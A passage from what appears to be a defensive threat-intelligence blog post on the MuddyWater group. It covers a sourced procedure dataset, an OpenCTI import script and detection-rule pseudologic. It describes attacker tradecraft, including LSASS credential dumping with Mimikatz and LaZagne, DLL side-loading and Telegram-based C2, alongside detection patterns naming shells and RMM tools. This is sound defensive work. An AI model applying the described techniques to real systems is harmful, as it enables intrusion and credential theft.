href="https://assets.kpmg.com/content/dam/kpmgsites/in/pdf/2022/07/KPMG_CTI_Report_muddy.pdf.coredownload.inline.pdf">KPMG — CTI Report MuddyWater PDF</a></li></ol><p><strong>Critical discipline:</strong> AI output was used only for source discovery. Every claim, mapping, and detection record required analyst review before entering the dataset.</p><h3>Phase 2: Procedure Dataset</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ji8MQqr4SpW620AV3QN67A.png"></figure><p>A procedure record is not an ATT&amp;CK technique. ATT&amp;CK describes what a class of actors <em>can</em> do. A procedure record describes what <em>this actor</em> did, in <em>this campaign</em>, as documented by <em>this source</em>, with a specific evidence label attached.</p><p>The distinction matters for detection. “Adversaries use scheduled tasks (T1053.005)” does not help you tune a detection rule. “BugSleep creates a scheduled task with a 43-minute repeat interval (INCD 2024, Observed)” does — because you now have a concrete interval to hunt for, a specific tool name, and a source you can cite in your detection rationale.</p><p>Each of the 10 records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/procedures.yaml">data/procedures.yaml</a> captures four things:</p><ul><li>The specific behavior — not the technique category</li><li>The source references that support it, with evidence labels</li><li>Candidate ATT&amp;CK technique mappings and the reasoning behind each candidate</li><li>Required telemetry, a detection idea, validation plan, and known limitations</li></ul><h4>Confidence Labels</h4><p>Each record carries one of four evidence labels inherited from the source assessment:</p><p><strong>Observed</strong> — the behavior appears directly in source telemetry, a recovered sample, a screenshot, or a government incident report with direct visibility into the event. This is the strongest label and the only one that justifies a high-priority detection without further corroboration.</p><p><strong>Reported</strong> — a source states the behavior occurred, but the evidence is assertion-level rather than artifact-level. Still usable; requires corroboration before relying on it alone.</p><p><strong>Assessed</strong> — the source draws an analytical conclusion based on multiple indicators. Appropriate for ATT&amp;CK candidate mappings; not sufficient alone for a new detection claim.</p><p><strong>Inferred</strong> — analyst conclusion derived from combining multiple reported facts across sources. Weakest label; flag for review before using in production.</p><p>All 10 procedures in this dataset carry <strong>Observed</strong> or <strong>High</strong> confidence. That is not a coincidence — it reflects the promotion threshold. Procedures that came only from secondary or inferred sources were not promoted into data/procedures.yaml; they stayed in the claim extraction notes for future work.</p><h4>The 10 Procedures</h4><p><strong>proc_mw_0001 — Spearphishing Email Delivery</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1566.001, T1566.002, T1534</em></p><p>Three delivery variants documented across all three primary government sources: ZIP attachments containing macro-enabled Excel files or PDFs; email links to Egnyte or OneDrive delivering compressed RMM installers; and emails sent from compromised legitimate accounts to increase lure credibility. In 2024, a Microsoft-update-lure campaign sent to 10,000+ accounts embedded a PowerShell API key, granting the actor direct agent access immediately after the RMM tool installed. Three independent government sources corroborate this procedure — it is the highest-confidence initial access vector in the dataset.</p><p><strong>proc_mw_0002 — Public-Facing Exploitation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024 · ATT&amp;CK: T1190</em></p><p>Secondary initial access vector to phishing. Documented CVEs: CVE-2020–1472 (Netlogon/Zerologon), CVE-2020–0688 (Exchange), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities confirmed by INCD 2024. Exploitation is typically followed by RMM tool deployment or custom backdoor staging. The VPN claim from INCD 2024 does not name a specific CVE — treat as Reported until a CVE is attributed.</p><p><strong>proc_mw_0003 — PowerShell Execution and Script Obfuscation</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1059.001, T1027</em></p><p>Cross-cutting technique present in every tool tier. PowGoop uses an obfuscated .dat + config.txt PowerShell chain for C2 beaconing. POWERSTATS is a persistent PowerShell backdoor. The 2024 lure embedded an API key executed via PowerShell to grant direct agent access. Obfuscation is applied consistently via Base64, XOR, and custom encoding. Detection anchor: Script Block Logging (EID 4104) is the primary telemetry dependency — without it, this procedure is nearly invisible to endpoint-only detection.</p><p><strong>proc_mw_0004 — DLL Side-Loading</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1574.002</em></p><p>PowGoop’s canonical execution method: a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load and execute the malicious DLL. INCD 2024 confirms continued use across the 2024 toolset. Detection requires Sysmon EID 7 (image load) with signing status — not available from Windows Event Log alone. This is the most telemetry-constrained procedure in the dataset; validation was PARTIAL because the lab's stub DLL did not produce sufficient EID 7 signal.</p><p><strong>proc_mw_0005 — Registry Run Key and Startup Folder Persistence</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1547.001</em></p><p>Small Sieve adds index.exe under the Run key named OutlookMicrosift — mimicking a Microsoft application name. Canopy installs its first WSF script in the startup folder. AA22-055A documents an additional key: SystemTextEncoding. INCD 2024 confirms continued use. The specific key names (OutlookMicrosift, SystemTextEncoding) are high-confidence IoCs when present; a detection based only on "new Run key written by a non-installer" will generate noise in most enterprise environments.</p><p><strong>proc_mw_0006 — Scheduled Task (43-Minute Beacon)</strong> <em>Confidence: Observed · Source: INCD 2024 (single source) · ATT&amp;CK: T1053.005</em></p><p>BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing. The interval is documented as customizable, but 43 minutes is the specific value observed in the INCD 2024 analysis. This is a single-source procedure — INCD 2024 only — which is why it carries a coverage score of 4 (correlated analytic) rather than 5 in the detection atlas. Before treating this interval as a high-confidence fingerprint in production, corroborate with a vendor source.</p><p><strong>proc_mw_0007 — RMM Tool Abuse</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2023, INCD 2024, multiple vendor sources · ATT&amp;CK: T1219</em></p><p>The most consistently documented technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple vendor sources), SimpleHelp, Level, PDQConnect (2024). The 2024 lure embedded an API key so the actor had direct agent access the moment the victim installed the tool. Detection must rely on delivery context and parent process — not binary name alone, since these are legitimate commercial tools.</p><p><strong>proc_mw_0008 — C2 via Web Protocols and DNS Tunneling</strong> <em>Confidence: Observed · Sources: AA22–055A, INCD 2024 · ATT&amp;CK: T1071.001, T1572, T1102</em></p><p>Multiple C2 channels documented. Small Sieve beacons via Telegram Bot API over HTTPS. Canopy sends collected data via HTTP POST. Blackout uses GET /questions and POST /about-us. AnchorRAT communicates over HTTPS port 443 in JSON format. Mori uses DNS tunneling. In 2024, Rentry.co was used as a legitimate platform for C2 redirection. The Telegram API is the highest-confidence detection anchor: outbound HTTPS to api.telegram.org from a non-browser process is unusual in enterprise environments and directly attributed across multiple sources.</p><p><strong>proc_mw_0009 — WMI System Discovery Survey</strong> <em>Confidence: Observed · Source: AA22–055A (script documented verbatim) · ATT&amp;CK: T1047, T1082, T1016, T1033, T1518.001</em></p><p>MuddyWater runs a PowerShell script that queries WMI to collect: IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username, and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2. The exact script is reproduced in the CISA advisory. The SecurityCenter2 query is the detection anchor: legitimate enterprise software rarely queries this WMI namespace outside AV management contexts, making it a low-noise signal.</p><p><strong>proc_mw_0010 — Credential Dumping from LSASS and Credential Stores</strong> <em>Confidence: Observed · Source: AA22–055A · ATT&amp;CK: T1003.001, T1003.004, T1003.005</em></p><p>Post-access credential access using three tools: Mimikatz and procdump64.exe against LSASS memory (T1003.001); LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005). Used post-exploitation to enable lateral movement with harvested credentials. Detection via Sysmon EID 10 (process accessing lsass.exe) is tool-agnostic — it fires regardless of whether the actor uses Mimikatz, procdump, or a custom variant with a different binary name. This is the most reliable detection path for this procedure.</p><h3>Phase 3: OpenCTI Knowledge Graph</h3><p>The procedure dataset and source register go into a self-hosted OpenCTI 6.2 instance. This creates the analytical record — queryable, relationship-aware, ATT&amp;CK-linked.</p><h3>OpenCTI Deployment</h3><p>The stack used in this project is documented and publicly reproducible. The full deployment — Docker Compose, connectors, and an AI enrichment connector that calls Claude via the Anthropic API — lives in a dedicated project:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200/opencti-intelligent-shield">github.com/anpa1200/opencti-intelligent-shield</a></li></ul><p><a href="https://github.com/anpa1200/opencti-intelligent-shield">GitHub - anpa1200/opencti-intelligent-shield: OpenCTI AI-driven threat intelligence enrichment with Claude and Docusaurus documentation</a></p><ul><li><strong>Medium guide:</strong></li></ul><p><a href="https://medium.com/@1200km/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a></p><ul><li><strong>Main guide:</strong> <a href="https://anpa1200.github.io/opencti-intelligent-shield/">anpa1200.github.io/opencti-intelligent-shield</a></li></ul><p><a href="https://anpa1200.github.io/opencti-intelligent-shield">OpenCTI AI Enrichment | The Intelligent Shield</a></p><p>The Intelligent Shield project covers: OpenCTI core stack (Redis, Elasticsearch, MinIO, RabbitMQ, platform, workers), MITRE ATT&amp;CK connector, and a custom internal enrichment connector that uses Claude to automatically summarize and enrich threat objects. Docker Compose files, a sanitized .env.example, and full setup instructions are all version-controlled.</p><p>To spin up the stack standalone (outside Operation Desert Hydra):</p><pre>git clone https://github.com/anpa1200/opencti-intelligent-shield.git openCTI<br>cd openCTI<br>cp .env.example .env<br># fill in tokens and passwords<br>./scripts/start-all.sh   # OpenCTI at :8080<br>./scripts/stop-all.sh    # halt, preserves volumes</pre><p>In the context of Operation Desert Hydra the stack is embedded in stack/ and started with bash start.sh — no separate clone needed. The Intelligent Shield project is the standalone reference deployment for anyone who wants OpenCTI without the lab.</p><h4>Step 10: Stack Start</h4><pre>bash start.sh --skip-lab   # starts OpenCTI + Elasticsearch + Kibana only</pre><p>All 12 core containers start: Redis, Elasticsearch, MinIO, RabbitMQ, OpenCTI platform, 3 workers, and the MITRE ATT&amp;CK connector.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_8pjCgFqyge4o-bahQTX6Q.png"></figure><p><strong>Result:</strong> OpenCTI reachable at http://localhost:8080. All containers healthy.</p><h4>Step 11: MITRE ATT&amp;CK Connector Sync</h4><p>The MITRE ATT&amp;CK connector loads 846 techniques into the graph. This sync must complete before the import script can link procedures to techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*k4o9xri96voJcB0EUQPqfg.png"></figure><p><strong>Result:</strong> 846 ATT&amp;CK patterns loaded. Connector state: ACTIVE.</p><h4>Step 12: Import Script</h4><p>Script: <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/tools/opencti_import.py"><strong>tools/opencti_import.py</strong></a></p><pre>export OPENCTI_URL=http://localhost:8080<br>export OPENCTI_TOKEN=&lt;admin token from stack/.env&gt;<br>python3 tools/opencti_import.py</pre><p>The script reads data/sources.yaml and data/procedures.yaml — it does not hardcode any intelligence. The YAML files are the single source of truth; the script is just a translation layer from those files into OpenCTI's API.</p><p><strong>What it creates and why:</strong></p><p><strong>Step 1 — Iran MOIS (Identity: Organization).</strong> Every object in OpenCTI needs a createdBy reference. Creating the sponsoring organization first gives all downstream objects a consistent authoring context and makes the attribution relationship explicit in the graph: MuddyWater → attributed-to → Iran MOIS.</p><p><strong>Step 2 — MuddyWater (Intrusion Set).</strong> The intrusion set object carries all known aliases: Seedworm, Mango Sandstorm, TA450, Static Kitten, TEMP.Zagros, Mercury, DEV-1084. Aliases matter for deduplication — OpenCTI uses them to avoid creating duplicate entities when the same actor appears under different names in different reports.</p><p><strong>Step 3 — Malware catalog (9 objects).</strong> Each actor-developed tool gets a Malware object with a description derived from source reporting. The catalog: POWERSTATS, PowGoop, Small Sieve, Canopy, Mori, BugSleep, AnchorRAT, SyncroRAT, DarkBit.</p><p><strong>Step 4 — Tool catalog (4 objects).</strong> Legitimate tools abused by the actor are STIX Tool objects, not Malware — the distinction matters for downstream analysis. The catalog: AteraAgent, SimpleHelp, Mimikatz, LaZagne.</p><p><strong>Step 5 — uses relationships.</strong> MuddyWater → uses → each malware and tool object. These relationships make the graph queryable: “which tools does this actor use?” returns all 13 objects in one hop.</p><p><strong>Step 6 — Reports from sources.yaml.</strong> One Report object per promoted source, with publisher, reliability rating, credibility score, actor claims, key entities, and ATT&amp;CK candidates written into the description. MuddyWater is added as an object reference so each report is queryable from the actor page.</p><p><strong>Step 7 — ATT&amp;CK pattern links from procedures.yaml.</strong> Iterates all attck_candidates across the 10 procedure records and creates MuddyWater → uses → ATT&amp;CK technique relationships. If the MITRE connector has not yet synced a technique, the script creates a stub Attack Pattern object (with x_mitre_id set) and flags it for enrichment. This prevents the import from failing on a timing issue between the connector sync and the import run.</p><p>The script is <strong>idempotent</strong>: every object lookup uses a read() before create(). Re-running after a partial failure or after the MITRE connector syncs simply confirms existing objects and fills in any gaps.</p><pre>#!/usr/bin/env python3<br>"""<br>Desert Hydra — Phase 3 OpenCTI graph import.Reads data/sources.yaml and data/procedures.yaml and creates:<br>  - Identity:       Iran MOIS (organization)<br>  - Intrusion Set:  MuddyWater (with all known aliases)<br>  - Malware:        actor-developed tools (9 objects)<br>  - Tool:           legitimate tools abused (4 objects)<br>  - Reports:        one per promoted source (up to 20)<br>  - Relationships:  attributed-to, uses (malware/tool/ATT&amp;CK)<br>Idempotent - existing objects are not duplicated.<br>ATT&amp;CK pattern links are skipped for techniques not yet synced by the<br>MITRE connector; re-run the script after the MITRE sync completes.<br>Usage:<br>    export OPENCTI_URL=http://localhost:8080<br>    export OPENCTI_TOKEN=&lt;admin-token&gt;<br>    python3 tools/opencti_import.py<br>"""<br>import os<br>import sys<br>import yaml<br>from pathlib import Path<br>from pycti import OpenCTIApiClient<br>from pycti.entities.opencti_identity import IdentityTypes<br># ── Bootstrap ─────────────────────────────────────────────────────────────────<br>OPENCTI_URL   = os.environ.get("OPENCTI_URL",   "http://localhost:8080")<br>OPENCTI_TOKEN = os.environ.get("OPENCTI_TOKEN", "")<br>REPO_ROOT     = Path(__file__).resolve().parent.parent<br>if not OPENCTI_TOKEN:<br>    sys.exit("ERROR: set OPENCTI_TOKEN environment variable")<br>api = OpenCTIApiClient(url=OPENCTI_URL, token=OPENCTI_TOKEN, log_level="error")<br>print(f"[desert-hydra] Connected  {OPENCTI_URL}")<br># ── Load YAML data ─────────────────────────────────────────────────────────────<br>with open(REPO_ROOT / "data" / "sources.yaml") as f:<br>    SOURCES = yaml.safe_load(f)["sources"]<br>with open(REPO_ROOT / "data" / "procedures.yaml") as f:<br>    PROCEDURES = yaml.safe_load(f)["procedures"]<br>print(f"[desert-hydra] Loaded {len(SOURCES)} sources, {len(PROCEDURES)} procedures")<br># ── TLP:WHITE ─────────────────────────────────────────────────────────────────<br>def get_tlp_white():<br>    results = api.marking_definition.list(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "definition", "values": ["TLP:WHITE"]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if results:<br>        return results[0]["id"]<br>    obj = api.marking_definition.create(<br>        definition_type="TLP",<br>        definition="TLP:WHITE",<br>        x_opencti_color="#ffffff",<br>        x_opencti_order=0,<br>    )<br>    return obj["id"]<br>TLP_WHITE = get_tlp_white()<br># ── Helpers ───────────────────────────────────────────────────────────────────<br>def _find(accessor, name):<br>    """Look up a STIX object by name. Returns the object dict or None."""<br>    return accessor.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "name", "values": [name]}],<br>            "filterGroups": [],<br>        }<br>    )<br><br>def link(from_id, to_id, rel_type, confidence=80):<br>    """Create a STIX core relationship; silently skip if it already exists."""<br>    try:<br>        api.stix_core_relationship.create(<br>            fromId=from_id,<br>            toId=to_id,<br>            relationship_type=rel_type,<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>        )<br>    except Exception:<br>        pass<br><br>ATTCK_NAMES = {<br>    "T1574.002": "DLL Side-Loading",<br>    "T1574.001": "DLL Search Order Hijacking",<br>    "T1546.015": "Component Object Model Hijacking",<br>    "T1218.010": "Regsvr32",<br>}<br>def find_or_create_attack_pattern(mitre_id):<br>    """Look up an ATT&amp;CK pattern by x_mitre_id. Create stub if not synced yet."""<br>    result = api.attack_pattern.read(<br>        filters={<br>            "mode": "and",<br>            "filters": [{"key": "x_mitre_id", "values": [mitre_id]}],<br>            "filterGroups": [],<br>        }<br>    )<br>    if result:<br>        return result["id"], False<br>    name = ATTCK_NAMES.get(mitre_id, mitre_id)<br>    obj = api.attack_pattern.create(<br>        name=name,<br>        x_mitre_id=mitre_id,<br>        description=f"MITRE ATT&amp;CK technique {mitre_id}. Created as stub pending MITRE connector sync.",<br>        objectMarking=[TLP_WHITE],<br>        confidence=75,<br>    )<br>    return obj["id"], True<br># ── Step 1: Iran MOIS Identity ────────────────────────────────────────────────<br>existing = _find(api.identity, "Iran MOIS")<br>if existing:<br>    MOIS_ID = existing["id"]<br>else:<br>    obj = api.identity.create(<br>        type=IdentityTypes.ORGANIZATION.value,<br>        name="Iran MOIS",<br>        description=(<br>            "Iranian Ministry of Intelligence and Security (MOIS). "<br>            "State sponsor attributed to MuddyWater cyber operations by CISA, FBI, "<br>            "CNMF, NCSC-UK, and NSA in joint advisory AA22-055A (February 2022)."<br>        ),<br>        objectMarking=[TLP_WHITE],<br>        confidence=85,<br>    )<br>    MOIS_ID = obj["id"]<br># ── Step 2: MuddyWater Intrusion Set ──────────────────────────────────────────<br>existing = _find(api.intrusion_set, "MuddyWater")<br>if existing:<br>    MW_ID = existing["id"]<br>else:<br>    obj = api.intrusion_set.create(<br>        name="MuddyWater",<br>        aliases=[<br>            "Seedworm", "Mango Sandstorm", "TA450",<br>            "Static Kitten", "TEMP.Zagros", "Mercury", "DEV-1084",<br>        ],<br>        description=(<br>            "Iranian MOIS subordinate threat group active since at least 2017. "<br>            "Targets government, defense, telecom, oil and gas, and MSPs globally. "<br>            "Significant focus on Israeli organizations since 2022. Known for "<br>            "spearphishing, RMM tool abuse, and a shift toward in-house tooling "<br>            "(BugSleep, AnchorRAT) beginning ~May 2024."<br>        ),<br>        resource_level="government",<br>        primary_motivation="espionage",<br>        confidence=85,<br>        objectMarking=[TLP_WHITE],<br>        createdBy=MOIS_ID,<br>    )<br>    MW_ID = obj["id"]<br>link(MW_ID, MOIS_ID, "attributed-to", 85)<br># ── Step 3: Malware catalog ────────────────────────────────────────────────────<br>MALWARE_CATALOG = [<br>    {"name": "POWERSTATS",  "aliases": ["Powermud"],   "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."},<br>    {"name": "PowGoop",     "aliases": ["Goopdate"],   "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."},<br>    {"name": "Small Sieve", "aliases": [],             "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."},<br>    {"name": "Canopy",      "aliases": ["Starwhale"],  "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."},<br>    {"name": "Mori",        "aliases": [],             "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."},<br>    {"name": "BugSleep",    "aliases": [],             "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."},<br>    {"name": "AnchorRAT",   "aliases": [],             "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."},<br>    {"name": "SyncroRAT",   "aliases": [],             "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."},<br>    {"name": "DarkBit",     "aliases": [],             "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},<br>]<br>MALWARE_IDS = {}<br>for m in MALWARE_CATALOG:<br>    existing = _find(api.malware, m["name"])<br>    if existing:<br>        MALWARE_IDS[m["name"]] = existing["id"]<br>    else:<br>        obj = api.malware.create(<br>            name=m["name"], aliases=m["aliases"],<br>            description=m["description"], is_family=False,<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        MALWARE_IDS[m["name"]] = obj["id"]<br># ── Step 4: Tool catalog ──────────────────────────────────────────────────────<br>TOOL_CATALOG = [<br>    {"name": "AteraAgent",  "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."},<br>    {"name": "SimpleHelp",  "aliases": [],            "description": "Commercial RMM abused in 2024 Israeli targeting."},<br>    {"name": "Mimikatz",    "aliases": [],            "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."},<br>    {"name": "LaZagne",     "aliases": [],            "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},<br>]<br>TOOL_IDS = {}<br>for t in TOOL_CATALOG:<br>    existing = _find(api.tool, t["name"])<br>    if existing:<br>        TOOL_IDS[t["name"]] = existing["id"]<br>    else:<br>        obj = api.tool.create(<br>            name=t["name"], aliases=t["aliases"],<br>            description=t["description"],<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        TOOL_IDS[t["name"]] = obj["id"]<br># ── Step 5: uses relationships ────────────────────────────────────────────────<br>for mid in MALWARE_IDS.values():<br>    link(MW_ID, mid, "uses", 80)<br>for tid in TOOL_IDS.values():<br>    link(MW_ID, tid, "uses", 80)<br># ── Step 6: Reports from sources.yaml ────────────────────────────────────────<br>SOURCE_DATES = {<br>    "src_usgov_aa22_055a_pdf_mirror":        "2022-02-24T00:00:00.000Z",<br>    "src_incd_muddywater_darkbit_2023":      "2023-02-07T00:00:00.000Z",<br>    "src_incd_muddywater_2024_evolution":    "2024-06-01T00:00:00.000Z",<br>    "src_cisa_aa22_055a_page":               "2022-02-24T00:00:00.000Z",<br>    "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z",<br>    "src_incd_recent_phishing_1947":         "2024-09-01T00:00:00.000Z",<br>    "src_mitre_attack_muddywater_g0069":     "2024-01-01T00:00:00.000Z",<br>}<br>REPORT_IDS = {}<br>for src in SOURCES:<br>    src_id   = src["id"]<br>    title    = src["title"]<br>    pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z")<br>    confidence = 85 if src.get("source_reliability") == "A" else 70<br>    description = (<br>        f"Publisher: {src['publisher']}\n"<br>        f"Reliability: {src.get('source_reliability','?')} / "<br>        f"Credibility: {src.get('information_credibility','?')}\n"<br>        f"URL: {src['url']}\n"<br>        f"Actor claims: {', '.join(src.get('actor_claims', []))}\n"<br>        f"ATT&amp;CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}"<br>    )<br>    existing = _find(api.report, title)<br>    if existing:<br>        REPORT_IDS[src_id] = existing["id"]<br>    else:<br>        obj = api.report.create(<br>            name=title, published=pub_date,<br>            description=description,<br>            report_types=["threat-report"],<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>            createdBy=MOIS_ID,<br>            objects=[MW_ID],<br>        )<br>        REPORT_IDS[src_id] = obj["id"]<br># ── Step 7: ATT&amp;CK pattern links from procedures ──────────────────────────────<br>linked, stubs = set(), []<br>for proc in PROCEDURES:<br>    for candidate in proc.get("attck_candidates", []):<br>        tid = candidate["technique"]<br>        if tid in linked:<br>            continue<br>        pattern_id, created_as_stub = find_or_create_attack_pattern(tid)<br>        link(MW_ID, pattern_id, "uses", 75)<br>        linked.add(tid)<br>        if created_as_stub:<br>            stubs.append(tid)<br># ── Summary ───────────────────────────────────────────────────────────────────<br>print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, "<br>      f"reports: {len(REPORT_IDS)}, ATT&amp;CK links: {len(linked)}, stubs: {len(stubs)}")<br></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WMvnfWfF50hj3Rk60DBAxA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XMTEbgDPokzU9iTK3sjEww.png"></figure><p><strong>Result:</strong> All objects created. Re-run confirms idempotency (no duplicates).</p><h4>Step 13: Intrusion Set Verification</h4><p><strong>Result:</strong> MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5KWUHIP3nkUhF6wpQpDa3g.png"></figure><h4>Step 14: Knowledge Graph</h4><p><strong>Result:</strong> Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&amp;CK techniques — all with source-annotated relationship edges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B2D00HhbhmdA5rtGm7klA.png"></figure><h4>Step 15: ATT&amp;CK Matrix Coverage</h4><p><strong>Result:</strong> 21 techniques highlighted across 8 tactics in the ATT&amp;CK Enterprise matrix.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4XphzS2vtf-peVJ-ArTglg.png"></figure><h4>Step 16: BugSleep Malware Detail</h4><p><strong>Result:</strong> BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3rt63a6jCO_-fk-BLdyaTw.png"></figure><h4>Step 17: Reports List</h4><p><strong>Result:</strong> 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-Ej71hGDspW3ahdqZWATAA.png"></figure><h4>Step 19: OpenCTI Dashboard</h4><p><strong>Result:</strong> Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HccHBJxzb-ZZu93WImMhg.png"></figure><h3>Phase 4: Detection Atlas</h3><p>The detection atlas is the core analytical output. Each of the 11 detection records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/detections.yaml">data/detections.yaml</a> contains:</p><ul><li>The specific MuddyWater behavior it targets (not the ATT&amp;CK technique category)</li><li>Required log sources and capability gates</li><li>Multi-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)</li><li>False positive classes and tuning guidance</li><li>A creation_logic field explaining <em>why</em> the rule is designed this way — the design decision, not just what the rule does</li></ul><p>Coverage scores follow a strict scale: <strong>5</strong> = lab-validated with a Kibana screenshot. <strong>4</strong> = correlated analytic (good logic, single source or partial lab). <strong>3</strong> = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.</p><p><strong>Step 20 — Analyst Review</strong></p><p>Before any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&amp;CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.</p><h4>det_mw_0001 — Email Delivery Correlated with Process Spawn</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/796/1*ycAoCbrkdxo6oxx4X0Gkhw.png"></figure><p><em>Techniques: T1566.001, T1566.002 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.</p><p><strong>Why it’s built this way:</strong> Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.</p><p><strong>Required telemetry:</strong> Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.</p><pre>event_type IN [email_delivery] AND<br>  (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR<br>   link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])<br>CORRELATE WITHIN 300 seconds WITH<br>event_type IN [process_create] WHERE<br>  parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND<br>  image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe",<br>            "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]</pre><p><strong>Key false positives:</strong> Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.</p><h4>det_mw_0002 — Web Service Spawning Interpreter Shell</h4><p><em>Techniques: T1190 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.</p><p><strong>Why it’s built this way:</strong> The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.</p><pre>event_type = process_create AND<br>parent_image IN 